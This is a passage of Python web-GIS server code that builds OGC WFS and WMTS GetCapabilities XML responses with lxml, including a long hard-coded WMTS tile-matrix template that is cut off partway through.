Value = etree.SubElement(Constraint, ows + "Value").text = "*"
Constraint = etree.SubElement(OperationsMetadata, ows + "Constraint", name="DefaultLockExpiry")
Value = etree.SubElement(Constraint, ows + "Value").text = "5"
FeatureTypeList = etree.SubElement(root, wfs + "FeatureTypeList")
FeatureType = etree.SubElement(FeatureTypeList, wfs + "FeatureType")
Name = etree.SubElement(FeatureType, wfs + "Name").text = "PointType"
Title = etree.SubElement(FeatureType, wfs + "Title").text = "Point Type"
DefaultSRS = etree.SubElement(FeatureType, wfs + "DefaultSRS").text = "EPSG:4326"
OutputFormats = etree.SubElement(FeatureType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
WGS84BoundingBox = etree.SubElement(FeatureType, ows + "WGS84BoundingBox")
LowerCorner = etree.SubElement(WGS84BoundingBox, ows + "LowerCorner").text = "-180 -90"
UpperCorner = etree.SubElement(WGS84BoundingBox, ows + "UpperCorner").text = "180 90"
ServesGMLObjectTypeList = etree.SubElement(root, wfs + "ServesGMLObjectTypeList")
GMLObjectType = etree.SubElement(ServesGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "PointType"
Title = etree.SubElement(GMLObjectType, wfs + "Title").text = "Point Type"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
SupportsGMLObjectTypeList = etree.SubElement(root, wfs + "SupportsGMLObjectTypeList")
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:AbstractGMLFeatureType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:PointType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:LineStringType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:PolygonType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:MultiPointType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:MultiCurveType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:MultiSurfaceType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:AbstractMetaDataType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
GMLObjectType = etree.SubElement(SupportsGMLObjectTypeList, wfs + "GMLObjectType")
Name = etree.SubElement(GMLObjectType, wfs + "Name").text = "gml:AbstractTopologyType"
OutputFormats = etree.SubElement(GMLObjectType, wfs + "OutputFormats")
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xml; subtype=gml/3.1.1"
Format = etree.SubElement(OutputFormats, wfs + "Format").text = "text/xhmtl"
Filter_Capabilities = etree.SubElement(root, ogc + "Filter_Capabilities")
Spatial_Capabilities = etree.SubElement(Filter_Capabilities, ogc + "Spatial_Capabilities")
GeometryOperands = etree.SubElement(Spatial_Capabilities, ogc + "GeometryOperands")
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Envelope"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Point"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:LineString"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Polygon"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:ArcByCenterPoint"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:CircleByCenterPoint"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Arc"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Circle"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:ArcByBulge"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Bezier"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Clothoid"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:CubicSpline"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Geodesic"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:OffsetCurve"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Triangle"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:PolyhedralSurface"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:TriangulatedSurface"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Tin"
GeometryOperand = etree.SubElement(GeometryOperands, ogc + "GeometryOperand").text = "gml:Solid"
SpatialOperators = etree.SubElement(Spatial_Capabilities, ogc + "SpatialOperators")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="BBOX")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Equals")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Disjoint")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Intersects")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Touches")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Crosses")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Within")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Contains")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Overlaps")
    SpatialOperator = etree.SubElement(SpatialOperators, ogc + "SpatialOperator", name="Beyond")
Scalar_Capabilities = etree.SubElement(Filter_Capabilities, ogc + "Scalar_Capabilities")
LogicalOperators = etree.SubElement(Scalar_Capabilities, ogc + "LogicalOperators")
ComparisonOperators = etree.SubElement(Scalar_Capabilities, ogc + "ComparisonOperators")
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "LessThan"
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "GreaterThan"
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "LessThanEqualTo"
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "GreaterThanEqualTo"
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "EqualTo"
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "NotEqualTo"
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "Like"
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "Between"
    ComparisonOperator = etree.SubElement(ComparisonOperators, ogc + "ComparisonOperator").text = "NullCheck"
ArithmeticOperators = etree.SubElement(Scalar_Capabilities, ogc + "ArithmeticOperators")
SimpleArithmetic = etree.SubElement(ArithmeticOperators, ogc + "SimpleArithmetic")
Functions = etree.SubElement(ArithmeticOperators, ogc + "Functions")
FunctionNames = etree.SubElement(Functions, ogc + "FunctionNames")
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "MIN"
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "MAX"
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "SIN"
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "COS"
FunctionName = etree.SubElement(FunctionNames, ogc + "FunctionName", nArgs="1").text = "TAN"
Id_Capabilities = etree.SubElement(Filter_Capabilities, ogc + "Id_Capabilities")
EID = etree.SubElement(Id_Capabilities, ogc + "EID")
FID = etree.SubElement(Id_Capabilities, ogc + "FID")
#WGS84BoundingBox = etree.SubElement(Layer, ows + "WGS84BoundingBox")
#SupportedCRS = etree.SubElement(TileMatrixSet, ows + "SupportedCRS" ).text = gConfig['wmts']['SupportedCRS']
ret = etree.tostring(root, pretty_print=True, xml_declaration=True, encoding=ENCODING)
print(ret)
return ret
def handle_wmts_GetCapabilities(params={}):
headers = {}
mimetype = 'text/xml;charset=' + ENCODING
s = ''
if params.has_key('TILETYPE') and params.has_key('SUBTYPE'):
s = create_wmts_GetCapabilities(params['TILETYPE'], params['SUBTYPE'])
return mimetype, s
def create_wmts_GetCapabilities(tiletype, subtype):
global gConfig
#'''
#namespace = {'ows':"http://www.opengis.net/ows/1.1", 'xlink':"http://www.w3.org/1999/xlink", 'xsi':"http://www.w3.org/2001/XMLSchema-instance", 'gml':"http://www.opengis.net/gml", 'schemaLocation':"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd"}
#ows = '{%s}' % namespace['ows']
#xlink = '{%s}' % namespace['xlink']
#root = etree.Element("Capabilities", xmlns="http://www.opengis.net/wmts/1.0", nsmap=namespace, version="1.0.0")
##ServiceIdentification
#ServiceIdentification = etree.SubElement(root, ows + "ServiceIdentification")
#Title = etree.SubElement(ServiceIdentification, ows + "Title").text = gConfig['webgis']['wmts']['ServiceIdentification_Title']
#ServiceType = etree.SubElement(ServiceIdentification, ows + "ServiceType").text = 'OGC WMTS'
#ServiceTypeVersion = etree.SubElement(ServiceIdentification, ows + "ServiceTypeVersion").text = '1.0.0'
##OperationsMetadata
#OperationsMetadata = etree.SubElement(root, ows + "OperationsMetadata")
#Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetCapabilities")
#DCP= etree.SubElement(Operation, ows + "DCP")
#HTTP= etree.SubElement(DCP, ows + "HTTP")
#href = xlink + 'href'
#Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['webgis']['wmts']['url'] + '?'})
#Constraint= etree.SubElement(Get, ows + "Constraint", name="GetEncoding")
#AllowedValues= etree.SubElement(Constraint, ows + "AllowedValues")
#Value= etree.SubElement(AllowedValues, ows + "Value").text = 'KVP'
#Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetTile")
#DCP= etree.SubElement(Operation, ows + "DCP")
#HTTP= etree.SubElement(DCP, ows + "HTTP")
#Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['webgis']['wmts']['url'] + '?'})
##Contents
#Contents = etree.SubElement(root, "Contents")
#Layer = etree.SubElement(Contents, "Layer")
#Title = etree.SubElement(Layer, ows + "Title").text = gConfig['webgis']['wmts']['Layer_Title']
#WGS84BoundingBox = etree.SubElement(Layer, ows + "WGS84BoundingBox")
#LowerCorner = etree.SubElement(WGS84BoundingBox, ows + "LowerCorner").text = gConfig['webgis']['wmts']['WGS84BoundingBox']['LowerCorner']
#UpperCorner = etree.SubElement(WGS84BoundingBox, ows + "UpperCorner").text = gConfig['webgis']['wmts']['WGS84BoundingBox']['UpperCorner']
#Identifier = etree.SubElement(Layer, ows + "Identifier").text = gConfig['webgis']['wmts']['Layer_Identifier']
#Style = etree.SubElement(Layer, "Style", isDefault="true")
#Title = etree.SubElement(Style, ows + "Title" ).text = 'Default'
#Identifier = etree.SubElement(Style, ows + "Identifier" ).text = 'default'
#Format = etree.SubElement(Layer, "Format" ).text = gConfig['mime_type'][gConfig['wmts']['format']]
#TileMatrixSetLink = etree.SubElement(Layer, "TileMatrixSetLink" )
#TileMatrixSet = etree.SubElement(TileMatrixSetLink, "TileMatrixSet" ).text = gConfig['webgis']['wmts']['TileMatrixSet']
#TileMatrixSet = etree.SubElement(Contents, "TileMatrixSet")
#Identifier = etree.SubElement(TileMatrixSet, ows + "Identifier" ).text = gConfig['webgis']['wmts']['TileMatrixSet']
#SupportedCRS = etree.SubElement(TileMatrixSet, ows + "SupportedCRS" ).text = gConfig['webgis']['wmts']['SupportedCRS']
#WellKnownScaleSet = etree.SubElement(TileMatrixSet, "WellKnownScaleSet" ).text = gConfig['webgis']['wmts']['WellKnownScaleSet']
#max_zoom_level, min_zoom_level = int(gConfig['wmts']['max_zoom_level']), int(gConfig['webgis']['wmts']['min_zoom_level'])
#if max_zoom_level < min_zoom_level:
#max_zoom_level, min_zoom_level = min_zoom_level, max_zoom_level
##zoomlist = range(max_zoom_level,min_zoom_level, -1)
#zoomlist = range(min_zoom_level, max_zoom_level+1, 1)
#pixelSize = float(gConfig['webgis']['wmts']['pixelSize'])
#tileWidth,tileHeight = int(gConfig['webgis']['wmts']['TileWidth']), int(gConfig['webgis']['wmts']['TileHeight'])
#minLonLat,maxLonLat = (float(gConfig['webgis']['wmts']['minLonLat'][0]), float(gConfig['webgis']['wmts']['minLonLat'][1])), (float(gConfig['webgis']['wmts']['maxLonLat'][0]), float(gConfig['webgis']['wmts']['maxLonLat'][1]))
##tileMatrixMinX, tileMatrixMaxX = (26.0, 102.0), (26.0, 104.0)
##tileMatrixMinY, tileMatrixMaxY = (24.0, 102.0), (26.0, 102.0)
#tileMatrixMinX, tileMatrixMaxX = (maxLonLat[1], minLonLat[0]), (maxLonLat[1], maxLonLat[0])
#tileMatrixMinY, tileMatrixMaxY = (minLonLat[1], minLonLat[0]), (maxLonLat[1], minLonLat[0])
#metersPerUnit = 0.0
#if gConfig['webgis']['wmts'].has_key('metersPerUnit'):
#metersPerUnit = float(gConfig['webgis']['wmts']['metersPerUnit'])
#else:
#metersPerUnitX = mapUtils.countDistanceFromLatLon(tileMatrixMaxX , tileMatrixMinX)/2*1000
##print('metersPerUnitX=%f' % metersPerUnitX)
#metersPerUnitY = mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY)/2*1000
##print('metersPerUnitY=%f' % metersPerUnitY)
#metersPerUnit = metersPerUnitY
##print('metersPerUnit=%f' % metersPerUnit)
#for i in zoomlist:
##matrixHeight = matrixWidth = mapUtils.tiles_on_level(i)
#matrixHeight = matrixWidth = mapUtils.tiles_on_level(max_zoom_level-(i-1))
##print('%d=%d' % (i , matrixHeight))
##scaleDenominatorX = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxX , tileMatrixMinX) * 1000./(tileWidth * matrixWidth)
##scaleDenominatorY = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) * 1000./(tileHeight * matrixHeight)
##print('scaleDenominatorX=%f, scaleDenominatorY=%f' % (scaleDenominatorX, scaleDenominatorY))
##scaleDenominator = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) * 1000. /(tileHeight * matrixHeight)
#scaleDenominator = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) /(tileHeight * matrixHeight)
#TileMatrix = etree.SubElement(TileMatrixSet, "TileMatrix" )
##Identifier = etree.SubElement(TileMatrix, ows + "Identifier" ).text = "ynsat_" + str(i)
#Identifier = etree.SubElement(TileMatrix, ows + "Identifier" ).text = str(i)
#ScaleDenominator = etree.SubElement(TileMatrix, "ScaleDenominator" ).text = '%.8f' % scaleDenominator
#TopLeftCorner = etree.SubElement(TileMatrix, "TopLeftCorner" ).text = ['webgis']['wmts']['TopLeftCorner']
#TileWidth = etree.SubElement(TileMatrix, "TileWidth" ).text = str(tileWidth)
#TileHeight = etree.SubElement(TileMatrix, "TileHeight" ).text = str(tileHeight)
#MatrixWidth = etree.SubElement(TileMatrix, "MatrixWidth" ).text = str(matrixWidth)
#MatrixHeight = etree.SubElement(TileMatrix, "MatrixHeight" ).text = str(matrixHeight)
#ret = etree.tostring(root, pretty_print=True, xml_declaration=True, encoding=ENCODING)
#print(ret)
#return ret
#'''
ret = '''<?xml version="1.0" encoding="UTF-8"?>
<Capabilities xmlns="http://www.opengis.net/wmts/1.0"
xmlns:ows="http://www.opengis.net/ows/1.1"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:gml="http://www.opengis.net/gml" xsi:schemaLocation="http://www.opengis.net/wmts/1.0 http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd"
version="1.0.0">
<ows:ServiceIdentification>
<ows:Title>%s</ows:Title>
<ows:ServiceType>OGC WMTS</ows:ServiceType>
<ows:ServiceTypeVersion>1.0.0</ows:ServiceTypeVersion>
</ows:ServiceIdentification>
<ows:OperationsMetadata>
<ows:Operation name="GetCapabilities">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="http://%s:%s/wmts?REQUEST=getcapabilities">
<ows:Constraint name="GetEncoding">
<ows:AllowedValues>
<ows:Value>KVP</ows:Value>
</ows:AllowedValues>
</ows:Constraint>
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
<ows:Operation name="GetTile">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="http://%s:%s/wmts?REQUEST=gettile">
<ows:Constraint name="GetEncoding">
<ows:AllowedValues>
<ows:Value>KVP</ows:Value>
</ows:AllowedValues>
</ows:Constraint>
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
</ows:OperationsMetadata>
<Contents>
<Layer>
<ows:Title>%s</ows:Title>
<ows:WGS84BoundingBox>
<ows:LowerCorner>-180.0 -90.0</ows:LowerCorner>
<ows:UpperCorner>180.0 90.0</ows:UpperCorner>
</ows:WGS84BoundingBox>
<ows:Identifier>%s</ows:Identifier>
<Style isDefault="true">
<ows:Identifier>_null</ows:Identifier>
</Style>
<Format>%s</Format>
<TileMatrixSetLink>
<TileMatrixSet>%s</TileMatrixSet>
</TileMatrixSetLink>
</Layer>
<TileMatrixSet>
<ows:Identifier>%s</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::900913</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>0</ows:Identifier>
<ScaleDenominator>5.590822639508929E8</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>1</ows:Identifier>
<ScaleDenominator>2.7954113197544646E8</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>2</ows:Identifier>
<ScaleDenominator>1.3977056598772323E8</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>4</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>3</ows:Identifier>
<ScaleDenominator>6.988528299386162E7</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>8</MatrixWidth>
<MatrixHeight>8</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>4</ows:Identifier>
<ScaleDenominator>3.494264149693081E7</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16</MatrixWidth>
<MatrixHeight>16</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>5</ows:Identifier>
<ScaleDenominator>1.7471320748465404E7</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>32</MatrixWidth>
<MatrixHeight>32</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>6</ows:Identifier>
<ScaleDenominator>8735660.374232702</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>64</MatrixWidth>
<MatrixHeight>64</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>7</ows:Identifier>
<ScaleDenominator>4367830.187116351</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>128</MatrixWidth>
<MatrixHeight>128</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>8</ows:Identifier>
<ScaleDenominator>2183915.0935581755</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>256</MatrixWidth>
<MatrixHeight>256</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>9</ows:Identifier>
<ScaleDenominator>1091957.5467790877</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>512</MatrixWidth>
<MatrixHeight>512</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>10</ows:Identifier>
<ScaleDenominator>545978.7733895439</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1024</MatrixWidth>
<MatrixHeight>1024</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>11</ows:Identifier>
<ScaleDenominator>272989.38669477194</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2048</MatrixWidth>
<MatrixHeight>2048</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>12</ows:Identifier>
<ScaleDenominator>136494.69334738597</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4096</MatrixWidth>
<MatrixHeight>4096</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>13</ows:Identifier>
<ScaleDenominator>68247.34667369298</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>8192</MatrixWidth>
<MatrixHeight>8192</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>14</ows:Identifier>
<ScaleDenominator>34123.67333684649</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16384</MatrixWidth>
<MatrixHeight>16384</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>15</ows:Identifier>
<ScaleDenominator>17061.836668423246</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>32768</MatrixWidth>
<MatrixHeight>32768</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>16</ows:Identifier>
<ScaleDenominator>8530.918334211623</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>65536</MatrixWidth>
<MatrixHeight>65536</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>17</ows:Identifier>
<ScaleDenominator>4265.4591671058115</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>131072</MatrixWidth>
<MatrixHeight>131072</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>18</ows:Identifier>
<ScaleDenominator>2132.7295835529058</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>262144</MatrixWidth>
<MatrixHeight>262144</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>19</ows:Identifier>
<ScaleDenominator>1066.3647917764529</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>524288</MatrixWidth>
<MatrixHeight>524288</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>20</ows:Identifier>
<ScaleDenominator>533.1823958882264</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1048576</MatrixWidth>
<MatrixHeight>1048576</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>21</ows:Identifier>
<ScaleDenominator>266.5911979441132</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2097152</MatrixWidth>
<MatrixHeight>2097152</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>22</ows:Identifier>
<ScaleDenominator>133.2955989720566</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4194304</MatrixWidth>
<MatrixHeight>4194304</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>23</ows:Identifier>
<ScaleDenominator>66.6477994860283</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>8388608</MatrixWidth>
<MatrixHeight>8388608</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>24</ows:Identifier>
<ScaleDenominator>33.32389974301415</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16777216</MatrixWidth>
<MatrixHeight>16777216</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>25</ows:Identifier>
<ScaleDenominator>16.661949871507076</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>33554432</MatrixWidth>
<MatrixHeight>33554432</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>26</ows:Identifier>
<ScaleDenominator>8.330974935753538</ScaleDenominator>
